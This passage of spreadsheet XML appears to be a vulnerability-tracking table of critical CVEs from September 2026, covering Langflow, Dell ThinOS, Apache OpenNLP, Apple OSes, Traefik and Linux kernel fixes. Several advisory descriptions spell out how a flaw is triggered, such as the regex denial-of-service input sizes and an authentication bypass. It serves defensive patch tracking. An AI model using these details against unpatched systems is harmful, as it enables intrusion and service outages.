        <v>0.005</v>
      </c>
      <c r="I38" s="5" t="inlineStr"/>
      <c r="J38" s="5" t="inlineStr"/>
      <c r="K38" s="5" t="inlineStr">
        <is>
          <t>langflow:langflow</t>
        </is>
      </c>
      <c r="L38" s="5" t="inlineStr"/>
      <c r="M38" s="5" t="inlineStr"/>
      <c r="N38" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O38" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P38" s="5" t="inlineStr"/>
      <c r="Q38" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R38" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.5 could allow a remote attacker to execute arbitrary OS commands due to improper neutralization of special elements used in an OS command.</t>
        </is>
      </c>
      <c r="S38" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79724</t>
        </is>
      </c>
    </row>
    <row r="39">
      <c r="A39" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B39" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C39" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81204</t>
        </is>
      </c>
      <c r="D39" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E39" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F39" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G39" s="5" t="inlineStr"/>
      <c r="H39" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I39" s="5" t="inlineStr"/>
      <c r="J39" s="5" t="inlineStr"/>
      <c r="K39" s="5" t="inlineStr">
        <is>
          <t>langflow:langflow</t>
        </is>
      </c>
      <c r="L39" s="5" t="inlineStr"/>
      <c r="M39" s="5" t="inlineStr"/>
      <c r="N39" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O39" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P39" s="5" t="inlineStr"/>
      <c r="Q39" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R39" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.5 could allow a remote attacker to execute arbitrary code due to code injection during graph construction.</t>
        </is>
      </c>
      <c r="S39" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81204</t>
        </is>
      </c>
    </row>
    <row r="40">
      <c r="A40" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B40" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C40" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81467</t>
        </is>
      </c>
      <c r="D40" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E40" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F40" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G40" s="5" t="inlineStr"/>
      <c r="H40" s="5" t="n">
        <v>0.038</v>
      </c>
      <c r="I40" s="5" t="inlineStr"/>
      <c r="J40" s="5" t="inlineStr"/>
      <c r="K40" s="5" t="inlineStr">
        <is>
          <t>dell:latitude_3330, dell:latitude_3420, dell:latitude_3440, dell:latitude_3450, dell:latitude_5440, dell:latitude_5450, dell:latitude_5520, dell:latitude_5530, dell:latitude_5540, dell:latitude_5550</t>
        </is>
      </c>
      <c r="L40" s="5" t="inlineStr"/>
      <c r="M40" s="5" t="inlineStr"/>
      <c r="N40" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O40" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P40" s="5" t="inlineStr"/>
      <c r="Q40" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R40" s="5" t="inlineStr">
        <is>
          <t>Dell ThinOS 10, versions prior to 2605_10. 2616, contains an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to Command execution.</t>
        </is>
      </c>
      <c r="S40" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81467</t>
        </is>
      </c>
    </row>
    <row r="41">
      <c r="A41" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B41" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C41" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82617</t>
        </is>
      </c>
      <c r="D41" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E41" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F41" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G41" s="5" t="inlineStr"/>
      <c r="H41" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I41" s="5" t="inlineStr"/>
      <c r="J41" s="5" t="inlineStr"/>
      <c r="K41" s="5" t="inlineStr">
        <is>
          <t>apache:opennlp</t>
        </is>
      </c>
      <c r="L41" s="5" t="inlineStr"/>
      <c r="M41" s="5" t="inlineStr"/>
      <c r="N41" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O41" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P41" s="5" t="inlineStr"/>
      <c r="Q41" s="5" t="inlineStr">
        <is>
          <t>CWE-1333</t>
        </is>
      </c>
      <c r="R41" s="5" t="inlineStr">
        <is>
          <t>The two built-in name-finder patterns exposed by
opennlp.tools.namefind.RegexNameFinderFactory - DEFAULT_REGEX_NAME_FINDER.EMAIL
and DEFAULT_REGEX_NAME_FINDER.URL - contain ambiguous nested quantifiers. An
application that obtains these finders through
RegexNameFinderFactory.getDefaultRegexNameFinders(...) and then applies them to
untrusted text through RegexNameFinder.find(String[]) or RegexNameFinder.find(String)
can be driven into super-linear backtracking or into unbounded matcher recursion by a
small crafted input.
For the EMAIL pattern, a long run of local-part characters that is never followed by an
@ forces the matcher to re-scan to end-of-input from every starting offset. Cost grows
quadratically with input length: an input of approximately 32 KB consumes several seconds
of CPU in a single find() call and returns no match, and each doubling of the input
multiplies the cost roughly four-fold.
For the URL pattern, the query-string sub-expression nests a capturing repetition inside
an outer repetition. The JDK matcher recurses once per query token, so an input of
approximately 4 KB containing many &amp;-separated tokens exhausts the thread stack and
causes java.lang.StackOverflowError to propagate out of find(), terminating the
calling thread. On a thread created with a smaller stack (for example -Xss512k, typical
of server worker pools) approximately 1 KB is sufficient.
In both cases an attacker who can supply text for analysis can convert a single request
into seconds to minutes of pinned CPU, or into an abrupt thread death, denying service to
the embedding application. No authentication, special configuration, or model file is
required beyond the application having selected one of the two built-in finders.
This issue affects Apache OpenNLP: from 2.0.0 through 2.5.11; from 3.0.0-M1 through
3.0.0-M5.
Users are recommended to upgrade to version 2.5.12, or to 3.0.0-M6 for users tracking the
3.0.0 milestone line, which fix the issue.</t>
        </is>
      </c>
      <c r="S41" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82617</t>
        </is>
      </c>
    </row>
    <row r="42">
      <c r="A42" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B42" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C42" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84520</t>
        </is>
      </c>
      <c r="D42" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E42" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F42" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G42" s="5" t="inlineStr"/>
      <c r="H42" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I42" s="5" t="inlineStr"/>
      <c r="J42" s="5" t="inlineStr"/>
      <c r="K42" s="5" t="inlineStr">
        <is>
          <t>apple:macos</t>
        </is>
      </c>
      <c r="L42" s="5" t="inlineStr"/>
      <c r="M42" s="5" t="inlineStr"/>
      <c r="N42" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O42" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P42" s="5" t="inlineStr"/>
      <c r="Q42" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="R42" s="5" t="inlineStr">
        <is>
          <t>A buffer overflow was addressed with improved size validation. This issue is fixed in macOS Golden Gate 27. A local attacker may be able to cause unexpected system termination or corrupt kernel memory.</t>
        </is>
      </c>
      <c r="S42" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84520</t>
        </is>
      </c>
    </row>
    <row r="43">
      <c r="A43" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B43" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C43" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84561</t>
        </is>
      </c>
      <c r="D43" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E43" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F43" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G43" s="5" t="inlineStr"/>
      <c r="H43" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I43" s="5" t="inlineStr"/>
      <c r="J43" s="5" t="inlineStr"/>
      <c r="K43" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os, apple:macos, apple:tvos, apple:visionos, apple:watchos</t>
        </is>
      </c>
      <c r="L43" s="5" t="inlineStr"/>
      <c r="M43" s="5" t="inlineStr"/>
      <c r="N43" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O43" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P43" s="5" t="inlineStr"/>
      <c r="Q43" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="R43" s="5" t="inlineStr">
        <is>
          <t>A double free issue was addressed with improved memory management. This issue is fixed in iOS 26.7 and iPadOS 26.7, iOS 27 and iPadOS 27, macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7, tvOS 27, visionOS 27, watchOS 27. An app may be able to cause unexpected system termination or corrupt kernel memory.</t>
        </is>
      </c>
      <c r="S43" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84561</t>
        </is>
      </c>
    </row>
    <row r="44">
      <c r="A44" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B44" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C44" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84609</t>
        </is>
      </c>
      <c r="D44" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E44" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F44" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G44" s="5" t="inlineStr"/>
      <c r="H44" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I44" s="5" t="inlineStr"/>
      <c r="J44" s="5" t="inlineStr"/>
      <c r="K44" s="5" t="inlineStr"/>
      <c r="L44" s="5" t="inlineStr"/>
      <c r="M44" s="5" t="inlineStr"/>
      <c r="N44" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O44" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P44" s="5" t="inlineStr"/>
      <c r="Q44" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="R44" s="5" t="inlineStr">
        <is>
          <t>A permissions issue was addressed with improved path validation. This issue is fixed in iOS 27 and iPadOS 27, macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7, tvOS 27, visionOS 27, watchOS 27. An app may be able to modify protected system files.</t>
        </is>
      </c>
      <c r="S44" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84609</t>
        </is>
      </c>
    </row>
    <row r="45">
      <c r="A45" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B45" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C45" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85594</t>
        </is>
      </c>
      <c r="D45" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E45" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F45" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G45" s="5" t="inlineStr"/>
      <c r="H45" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I45" s="5" t="inlineStr"/>
      <c r="J45" s="5" t="inlineStr"/>
      <c r="K45" s="5" t="inlineStr">
        <is>
          <t>traefik:traefik</t>
        </is>
      </c>
      <c r="L45" s="5" t="inlineStr"/>
      <c r="M45" s="5" t="inlineStr"/>
      <c r="N45" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O45" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P45" s="5" t="inlineStr"/>
      <c r="Q45" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R45" s="5" t="inlineStr">
        <is>
          <t>Traefik versions from v3.7.1 fail to enforce crossProviderNamespaces restrictions on the traefik.ingress.kubernetes.io/service.middlewares Service annotation in the Kubernetes Ingress provider. A namespace-limited tenant excluded from the allowlist can attach an operator-owned middleware to its Service, and if that middleware injects backend credentials, recover them at a controlled backend.</t>
        </is>
      </c>
      <c r="S45" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85594</t>
        </is>
      </c>
    </row>
    <row r="46">
      <c r="A46" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B46" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C46" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85595</t>
        </is>
      </c>
      <c r="D46" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E46" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F46" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G46" s="5" t="inlineStr"/>
      <c r="H46" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I46" s="5" t="inlineStr"/>
      <c r="J46" s="5" t="inlineStr"/>
      <c r="K46" s="5" t="inlineStr">
        <is>
          <t>traefik:traefik</t>
        </is>
      </c>
      <c r="L46" s="5" t="inlineStr"/>
      <c r="M46" s="5" t="inlineStr"/>
      <c r="N46" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O46" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P46" s="5" t="inlineStr"/>
      <c r="Q46" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R46" s="5" t="inlineStr">
        <is>
          <t>Traefik versions before v2.11.55 and versions v3.0.0 through v3.7.10 contain an authentication bypass vulnerability in the digestAuth middleware where unknown usernames receive an empty secret instead of rejection. Attackers can compute a valid digest response using the empty secret and arbitrary credentials to bypass authentication on any digestAuth-protected route without a valid username or password.</t>
        </is>
      </c>
      <c r="S46" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85595</t>
        </is>
      </c>
    </row>
    <row r="47">
      <c r="A47" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B47" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C47" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85596</t>
        </is>
      </c>
      <c r="D47" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E47" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F47" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G47" s="5" t="inlineStr"/>
      <c r="H47" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I47" s="5" t="inlineStr"/>
      <c r="J47" s="5" t="inlineStr"/>
      <c r="K47" s="5" t="inlineStr">
        <is>
          <t>traefik:traefik</t>
        </is>
      </c>
      <c r="L47" s="5" t="inlineStr"/>
      <c r="M47" s="5" t="inlineStr"/>
      <c r="N47" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O47" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P47" s="5" t="inlineStr"/>
      <c r="Q47" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R47" s="5" t="inlineStr">
        <is>
          <t>Traefik versions &gt;= v3.7.0 and &lt;= v3.7.10 contain an authentication bypass in the Kubernetes Ingress NGINX provider. The TLS option generated for an Ingress carrying the nginx.ingress.kubernetes.io/auth-tls-secret annotation was named after the Ingress namespace and name. As a result, two Ingress objects sharing the same host, the same client CA secret, and the same client-authentication mode produced two distinct TLS option names for that host. Traefik treats this as a TLS options conflict and falls back to the entry point's default TLS configuration, which does not request a client certificate, so a route configured with nginx.ingress.kubernetes.io/auth-tls-verify-client: "on" becomes reachable without a client certificate. Only the v3.7 line is affected; the issue is fixed in v3.7.11.</t>
        </is>
      </c>
      <c r="S47" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85596</t>
        </is>
      </c>
    </row>
    <row r="48">
      <c r="A48" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B48" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C48" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89778</t>
        </is>
      </c>
      <c r="D48" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E48" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F48" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G48" s="5" t="inlineStr"/>
      <c r="H48" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I48" s="5" t="inlineStr"/>
      <c r="J48" s="5" t="inlineStr"/>
      <c r="K48" s="5" t="inlineStr"/>
      <c r="L48" s="5" t="inlineStr"/>
      <c r="M48" s="5" t="inlineStr"/>
      <c r="N48" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O48" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P48" s="5" t="inlineStr"/>
      <c r="Q48" s="5" t="inlineStr"/>
      <c r="R48" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
isofs: fix out-of-bounds page array access on empty zisofs block
zisofs_uncompress_block()'s empty-block fast path returns
pcount &lt;&lt; PAGE_SHIFT, ignoring the incoming poffset, unlike the
decompression path which returns bytes produced relative to poffset.
zisofs_fill_pages() uses that return to advance its page cursor, so when
the zisofs block size is below PAGE_SIZE and a sub-page block leaves
poffset partway into a page, a following empty block over-counts and
advances pages[] one element past its end, after which
"if (poffset &amp;&amp; *pages)" reads pages[1] out of bounds.  rock.c only
rejects a block-size shift &gt; 17, so a crafted "ZF" Rock Ridge record can
set it below PAGE_SHIFT; the bug is reached by an ordinary read() of a
compressed file on such a mounted ISO9660 image.
Return the byte count relative to poffset and zero only
[poffset, PAGE_SIZE) of the first page, matching the decompression path.
The page-aligned case (poffset == 0) is unaffected.
  BUG: KASAN: slab-out-of-bounds in zisofs_read_folio (fs/isofs/compress.c:290)
  Read of size 8 at addr ffff88800f5eac48 by task exploit/142
   zisofs_read_folio (fs/isofs/compress.c:290)
   read_pages (mm/readahead.c:184)
   ...
   filemap_read (mm/filemap.c:2814)
   vfs_read (fs/read_write.c:574)
   __x64_sys_pread64 (fs/read_write.c:769)
   do_syscall_64 (arch/x86/entry/syscall_64.c:94)
   entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:121)
  The buggy address is located 0 bytes to the right of the
  allocated 8-byte region in the kmalloc-8 cache</t>
        </is>
      </c>
      <c r="S48" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89778</t>
        </is>
      </c>
    </row>
    <row r="49">
      <c r="A49" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B49" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C49" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89783</t>
        </is>
      </c>
      <c r="D49" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E49" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F49" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G49" s="5" t="inlineStr"/>
      <c r="H49" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I49" s="5" t="inlineStr"/>
      <c r="J49" s="5" t="inlineStr"/>
      <c r="K49" s="5" t="inlineStr"/>
      <c r="L49" s="5" t="inlineStr"/>
      <c r="M49" s="5" t="inlineStr"/>
      <c r="N49" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O49" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P49" s="5" t="inlineStr"/>
      <c r="Q49" s="5" t="inlineStr"/>
      <c r="R49" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
xfrm6: fix out-of-bounds write in xfrm6_input_addr() when secpath is full
The depth check in xfrm6_input_addr() is off by one:
  if (1 + sp-&gt;len == XFRM_MAX_DEPTH)
          goto drop;
  ...
  sp-&gt;xvec[sp-&gt;len++] = x;
xfrm_input() can leave sp-&gt;len == XFRM_MAX_DEPTH, and the transport-mode
receive path re-enters IPv6 input via xfrm_trans_reinject() with that
secpath preserved. If the inner packet carries a destination-options HAO
option or a type-2 routing header, xfrm6_input_addr() is called with
sp-&gt;len == XFRM_MAX_DEPTH; the check (1 + 6 == 6) is false, so
sp-&gt;xvec[sp-&gt;len++] writes one slot past the 6-element xvec[]. The write
stays within the sec_path allocation (invisible to KASAN); UBSAN_BOUNDS
flags it and panics under panic_on_warn.
Use "sp-&gt;len &gt;= XFRM_MAX_DEPTH", matching xfrm_input(). This also
restores one chain level the old check rejected at sp-&gt;len == 5.
  UBSAN: array-index-out-of-bounds in net/ipv6/xfrm6_input.c:309:10
  index 6 is out of range for type 'xfrm_state *[6]'</t>
        </is>
      </c>
      <c r="S49" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89783</t>
        </is>
      </c>
    </row>
    <row r="50">
      <c r="A50" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B50" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C50" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89788</t>
        </is>
      </c>
      <c r="D50" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E50" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F50" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G50" s="5" t="inlineStr"/>
      <c r="H50" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I50" s="5" t="inlineStr"/>
      <c r="J50" s="5" t="inlineStr"/>
      <c r="K50" s="5" t="inlineStr"/>
      <c r="L50" s="5" t="inlineStr"/>
      <c r="M50" s="5" t="inlineStr"/>
      <c r="N50" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O50" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P50" s="5" t="inlineStr"/>
      <c r="Q50" s="5" t="inlineStr"/>
      <c r="R50" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ksmbd: fix tree connection use-after-free in smb2_tree_connect()
ksmbd_tree_conn_connect() publishes a new tree connection in
sess-&gt;tree_conns with a single reference and returns its pointer to
smb2_tree_connect(). The handler continues to initialize the object and
build the response after publication. A concurrent session logoff can
erase the connection and drop that reference, freeing the object while
the handler still uses it.
BUG: KASAN: slab-use-after-free in smb2_tree_connect+0xe3d/0xf90
  smb2_tree_connect (fs/smb/server/smb2pdu.c:2872)
  handle_ksmbd_work
  process_one_work
  worker_thread
  kthread
After xa_store() succeeds, take a second reference before releasing
tree_conns_lock. The original reference belongs to the xarray entry and
the second belongs to the creating smb2_tree_connect() handler.
Keep the references balanced in every path:
- On normal exit or an error after publication, smb2_tree_connect()
  drops its creator reference. Error cleanup also calls
  ksmbd_tree_conn_disconnect(), which drops the xarray reference only if
  it removes the exact entry.
- SMB2 TREE_DISCONNECT uses the same helper to remove the entry and drop
  its xarray reference. The request's existing lookup reference remains
  owned by the request and is released by the existing cleanup.
- Session LOGOFF removes each entry and drops its xarray reference. If
  it wins the race, later cleanup sees that the entry is gone and does
  not drop that reference again.
To enforce this ownership, claim the disconnected state and erase the
exact entry atomically under tree_conns_lock. This guarantees one drop
for the xarray reference and one drop by each in-flight user, regardless
of which teardown path wins. If logoff removes the entry before
initialization completes, fail the connect instead of marking the
detached object TREE_CONNECTED.</t>
        </is>
      </c>
      <c r="S50" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89788</t>
        </is>
      </c>
    </row>
    <row r="51">
      <c r="A51" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B51" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C51" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89847</t>
        </is>
      </c>
      <c r="D51" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E51" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F51" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G51" s="5" t="inlineStr"/>
      <c r="H51" s="5" t="inlineStr"/>
      <c r="I51" s="5" t="inlineStr"/>
      <c r="J51" s="5" t="inlineStr"/>
      <c r="K51" s="5" t="inlineStr"/>
      <c r="L51" s="5" t="inlineStr"/>
      <c r="M51" s="5" t="inlineStr"/>
      <c r="N51" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O51" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P51" s="5" t="inlineStr"/>
      <c r="Q51" s="5" t="inlineStr"/>
      <c r="R51" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: qla2xxx: Avoid double completion in async IOCB timeout
qla2x00_async_iocb_timeout() tries to abort a timed-out async IOCB. When
qla24xx_async_abort_cmd() fails, both the SRB_LOGIN_CMD path and the
SRB_CTRL_VP/default path scan outstanding_cmds[] for the SRB and then
call sp-&gt;done(sp, QLA_FUNCTION_TIMEOUT) unconditionally, without checking
whether the SRB was actually found and removed.
If the response ISR completes the same handle first, it removes the SRB
under qp_lock_ptr and runs sp-&gt;done() -&gt; complete(sp-&gt;comp). The
submitter qla24xx_control_vp() wakes from wait_for_completion(), clears
sp-&gt;comp, drops its reference and returns, reclaiming the on-stack
completion. The timer reference keeps the SRB alive across the timeout
handler, but not the submitter's stack. The timeout then issues a second
sp-&gt;done() -&gt; qla_ctrlvp_sp_done(), which evaluates "if (sp-&gt;comp)
complete(sp-&gt;comp)"; with the pointer loaded before the submitter's NULL
store, complete() writes into the freed stack frame, a use-after-free.
Track whether this path removed the SRB from outstanding_cmds and only
call sp-&gt;done() when it did, so the command is completed exactly once by
whichever path owns it. This mirrors the sp_found guard already used in
qla24xx_abort_iocb_timeout().</t>
        </is>
      </c>
      <c r="S51" s="6" t="inlineStr">
        <is>
